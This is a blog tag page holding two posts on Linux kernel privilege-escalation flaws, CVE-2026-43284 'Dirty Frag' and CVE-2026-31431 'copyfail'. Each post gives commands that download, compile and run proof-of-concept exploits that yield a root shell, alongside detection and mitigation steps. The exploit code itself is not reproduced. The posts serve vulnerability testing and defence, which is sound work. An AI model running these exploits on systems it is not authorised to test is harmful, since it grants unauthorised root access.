Skip to main content

2 posts tagged with "cybersecurity"

View All Tags

CVE-2026-43284 Dirty Frag mitigation

Β· 3 min read
Idriss Neumann
Idriss Neumann
founder cwcloud.tech

After copyfail, here's a new major vulnerability discovered by Hyunwoo Kim (@v4bel) using AI and known as "Dirty Frag" (CVE-2026-43284) that allows a non-root user to escalate privileges and become root.

We provide a demo that you can use in order to test if your system is vulnerable to this issue.

warning

Do not use this code on systems you do not own or explicitly have permission to test.

Testing​

On a local machine​

With root privileges, run the following command to install the necessary dependencies (if they are not already installed):

root# dnf install git gcc -y

Then without root privileges, run the following command to clone the repository and compile the exploit:

$ git clone https://gitlab.cwcloud.tech/oss/cybersec/dirtyfrag.git
$ cd dirtyfrag
$ gcc -O0 -Wall -o dirtyfrag-demo demo.c
$ ./dirtyfrag-demo
root#

You can also quickly test with this script:

$ curl https://gitlab.cwcloud.tech/oss/cybersec/dirtyfrag/-/raw/main/dirtyfrag-demo.sh > dirtyfrag-demo.sh
$ chmod +x dirtyfrag-demo.sh
$ ./dirtyfrag-demo.sh
root#

Demo with AlmaLinux:

dirtyfrag-demo

warning

After running the exploit, you have to either run this command (with root privileges) or reboot the system:

root# echo 3 > /proc/sys/vm/drop_caches

With docker compose​

Unlike the CopyFail exploit, this exploit doesn't seems to affect OCI/docker containers using the major distributions based images like Ubuntu, Alpine or even AlmaLinux. You can test it with the following commands:

$ git clone https://gitlab.cwcloud.tech/oss/cybersec/dirtyfrag.git >/dev/null 2>&1
$ cd dirtyfrag/
$ docker compose up -d alpine --build --force-recreate > /dev/null 2>&1 && docker logs dirtyfrag-alpine
dirtyfrag: failed (rc=1)
$ docker compose up -d ubuntu --build --force-recreate > /dev/null 2>&1 && docker logs dirtyfrag-ubuntu
dirtyfrag: failed (rc=1)
$ docker compose up -d almalinux --build --force-recreate > /dev/null 2>&1 && docker logs dirtyfrag-almalinux
dirtyfrag: failed (rc=1)

Demo on a vulnerable host:

dirtyfrag-docker

Mitigation​

In order to unload modules with modeprob, you can run this script with root privileges:

root# curl https://gitlab.cwcloud.tech/oss/cybersec/dirtyfrag/-/raw/main/dirtyfrag-mitigation.sh > dirtyfrag-mitigation.sh
root# chmod +x dirtyfrag-mitigation.sh
root# ./dirtyfrag-mitigation.sh
root# /sbin/reboot
warning

You have to reboot the system after running the mitigation script. You can see with demo below that the system is still vulnerable until you reboot it:

dirtyfrag-mitigation

Conclusion​

With the AI, we might expect lot's of exploits like this one to be discovered in the future, and it's important to keep an eye on them and apply the necessary mitigations as soon as possible regarding their criticality.

In this case, the mitigation is quite simple and ain't require a kernel update, but it's not the case for other vulnerabilities (like CopyFail).

Other sources and references​

CVE-2026-31431 copyfail mitigation

Β· 2 min read
Idriss Neumann
Idriss Neumann
founder cwcloud.tech

Recently Xint disclosed a very critical vulnerability in the Linux kernel, CVE-2026-31431, which allows local attackers to gain root privileges. More details about how this vulnerability works can be found in the Xint Blogpost.

We provide a demo that you can use in order to test if your system is vulnerable to this issue.

warning

Do not use this code on systems you do not own or explicitly have permission to test.

warning

Be careful to backup your original su binary as this exploit modifies it.

Testing​

On a local machine​

First, ensure bakup the su binary on your system, as this exploit may modify it:

root# cp /usr/bin/su /usr/bin/su.bak

Then with a non-root user, run the following commands to execute the exploit script:

user$ curl https://gitlab.cwcloud.tech/oss/cybersec/cve-2026-31431-demo/-/raw/main/cve-2026-31431.py > cve-2026-31431.py
user$ python3 cve-2026-31431.py
root#

Then restore the original su binary:

root# mv /usr/bin/su.bak /usr/bin/su

With docker compose​

Better with safer isolation (not contaminating your su binary):

$ git clone https://gitlab.cwcloud.tech/oss/cybersec/cve-2026-31431-demo.git
$ cd cve-2026-31431-demo 
$ docker compose up -d --build --force-recreate
$ docker exec -it cve-2026-31431 /bin/bash
demo@8536b73279be:/app$ su -
#

Mitigation​

Xint has provided a way to mitigate for several distributions including Debian or Ubuntu:

root# echo 3 > /proc/sys/vm/drop_caches
root# echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
root# rmmod algif_aead 2>/dev/null || true

However, due to the 2>/dev/null || true, lot's of people aren't aware that the mitigation ain't working on all distributions, and in particular on RHEL based distributions which has the module compiled as builtin in the kernel and miss the following error message:

rmmod: ERROR: Module algif_aead module is builtin.

Here's a demo which shows the mitigation ain't working on Almalinux:

cve-2026-31431 mitigation

And unfortunately, all the mitigations for those distributions involve a reboot. Here's one of the simplest until a new kernel patch is released:

root# grubby --update-kernel=ALL --args="initcall_blacklist=algif_aead_init"
root# reboot

Here's a demo of the mitigation working on the same Almalinux system (after restoring the original su binary):

cve-2026-31431 mitigation

Other sources and references​